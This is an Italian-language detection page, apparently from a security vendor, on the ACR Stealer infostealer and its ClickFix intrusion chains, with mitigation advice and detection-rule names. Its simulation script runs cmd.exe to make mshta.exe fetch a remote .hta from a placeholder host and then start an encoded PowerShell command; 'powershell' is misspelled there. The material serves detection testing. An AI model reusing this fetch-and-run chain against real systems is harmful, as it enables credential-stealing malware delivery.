ACR Stealer: Due catene di intrusione osservate durante l’aumento dell’attività di minaccia
Detection stack
- AIDR
- Alert
- ETL
- Query
Riepilogo
ACR Stealer è una famiglia di malware specializzata nel furto di informazioni che utilizza tecniche di ingegneria sociale in stile ClickFix per colpire ambienti aziendali. Il malware opera attraverso due principali catene di infezione: una che si basa su payload consegnati tramite WebDAV con loader Python e un controllo e comando basato su blockchain, e un’altra che utilizza MSHTA con la consegna di payload tramite steganografia. Il suo obiettivo principale è rubare credenziali del browser, token di autenticazione e documenti sensibili.
Indagine
Microsoft Defender Experts ha osservato un aumento dell’attività tra la fine di aprile e metà giugno 2026. L’indagine ha identificato due percorsi di esecuzione separati: una campagna basata su disco che coinvolge Python e attività pianificate, e una campagna senza file che utilizza MSHTA ed esecuzioni di shellcode in memoria. Gli analisti hanno anche documentato metodi avanzati di evasione, tra cui timestomping, PowerShell offuscato e risolutori dead-drop supportati da blockchain.
Mitigazione
Le organizzazioni dovrebbero formare gli utenti a riconoscere i prompt ClickFix e limitare l’esecuzione di script non attendibili attraverso il controllo delle applicazioni. Ridurre l’esposizione al malvertising e applicare il filtraggio web può aiutare a interrompere i tentativi di accesso iniziale. Indurire i punti finali limitando la dipendenza da credenziali memorizzate nel browser e applicando l’autenticazione a più fattori è anche essenziale per ridurre il rischio di furto di credenziali.
Risposta
Se viene rilevata questa attività, i dispositivi interessati dovrebbero essere isolati immediatamente e tutte le credenziali e i token potenzialmente compromessi dovrebbero essere ruotati. I token di sessione dovrebbero essere revocati, e gli investigatori dovrebbero esaminare le connessioni in uscita verso condivisioni remote sospette o servizi di hosting di immagini. L’EDR in modalità blocco dovrebbe essere utilizzato per contenere la minaccia e rimuovere efficientemente gli artefatti dannosi.
Flusso di Attacco
Rilevamenti
Comportamento sospetto di evasione difensiva MSHTA di LOLBAS rilevato tramite comandi associati (via process_creation)
Visualizza
LOLBAS Conhost (via cmdline)
Visualizza
Attività pianificata tramite oggetto COM (via powershell)
Visualizza
Possibile scoperta di informazioni di sistema usando il modulo Wmi Powershell (via powershell)
Visualizza
Rilevamento di PowerShell offuscato e attività pianificate mascherate da aggiornamenti software [Windows Powershell]
Visualizza
Rilevamento dell’esecuzione di ACR Stealer tramite ClickFix Lures [Windows Process Creation]
Visualizza
Esecuzione di simulazione
Prerequisito: il controlli pre-volo di Telemetry & Baseline devono essere riusciti.
Motivazione: questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) destinata ad attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirare a generare la telemetria esatta prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a errori di diagnosi.
-
Narrazione di attacco & Comandi: L’avversario prende di mira un utente con un falso “errore del browser” (ClickFix). Una volta che l’utente copia e incolla il comando in un terminale,
cmd.exeviene invocato. Il comando istruiscemshta.exea contattare un URL remoto per recuperare uno script dannoso. Per ulteriori evasioni del rilevamento tramite stringhe semplici, lo script utilizzapowershell.execon un comando codificato (-Enc) per scaricare ed eseguire il malware ACR Stealer in memoria, bypassando la tradizionale scansione basata su file. -
Script di test regressione:
# Simulazione della catena di ClickFix di ACR Stealer # Passo 1: Simulare il wrapper cmd.exe # Passo 2: Invo care mshta.exe con un URL # Passo 3: Seguito da un comando PowerShell codificato $encodedCommand = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Write-Host 'Simulating ACR Stealer Payload Execution'")) Start-Process "cmd.exe" -ArgumentList "/c mshta.exe https://example.com/payload.hta & powerhsell.exe -Enc $encodedCommand" -
Comandi di pulizia:
# Non vengono creati file persistenti in questa simulazione, ma assicurarsi che non siano presenti processi orfani Stop-Process -Name "mshta" -ErrorAction SilentlyContinue Stop-Process -Name "powershell" -ErrorAction SilentlyContinue